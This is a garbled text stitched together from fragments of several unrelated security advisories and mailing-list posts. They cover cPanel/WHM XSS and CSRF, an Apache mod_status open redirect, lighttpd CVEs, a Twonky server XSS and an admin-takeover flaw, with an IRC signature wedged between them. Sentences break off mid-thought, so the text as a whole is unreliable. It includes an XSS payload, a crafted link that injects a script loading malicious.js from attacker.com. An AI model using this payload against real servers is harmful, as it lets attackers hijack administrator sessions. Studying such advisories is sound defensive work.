1. DESCRIPTION OF THE SOFTWARE
cPanel is a hosting automation tool.
WHM interface provides access to the heart of the cPanel and WHM package
and allows a Server Administrator to simply configure a few options and
be on their way to hosting web sites.
2. DESCRIPTION OF THE VULNERABILITY
There are XSS (identified by CVE-2008-2070) and CSRF (identified by
--
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
_______________________________________________
To report a botnet PRIVATELY please email: c2report@isotf.org
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Apache, thus making it more widely used than all other web
servers combined.
mod_status : http://httpd.apache.org/docs/2.0/mod/mod_status.html
- From apache site : "The Status module allows a server administrator to find out how well their server is performing. A HTML page is presented that gives the current server statistics in an easily readable form. If required this page can be made to automatically refresh (given a compatible browser). Another page gives a simple machine-readable list of the current server state."
- --- 1. Apache Refresh Header - Open Redirector (XSS) Vulnerability ---
During the fact that Apache mod_status do not filter char ";" we can inject new URL.
This fact give attacker open redirector and can lead to phishing attack.
remote attackers to cause lighttpd to consume memory, and cause a
denial of service attack.
CVE-2008-4359
Inconsistent handling of URL patterns could lead to the disclosure
of resources a server administrator did not anticipate when using
rewritten URLs.
CVE-2008-4360
Upon file systems which don't handle case-insensitive paths differently
it might be possible that unanticipated resources could be made available
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not
Found</H1>/NON-EXISTENT-PAGE was not found
on this server.</BODY></HTML>
Thus, an attacker could induce the server administrator (victim) in
clicking on a specially crafted link, pointing to:
http://twonky:9000/fake_config_page<script type="text/javascript"
src="http://attacker.com/malicious.js" ></script>
authenticated.
III. ANALYSIS
Exploitation of this vulnerability allows an attacker to execute all
commands granted to the server administrator. An attacker can add and
delete users and entire organizations, and initiate restore operations
for clients that connect to the server.
Using this vulnerability, an attacker is able to upload arbitrary files
to the server. This results in the execution of arbitrary code with
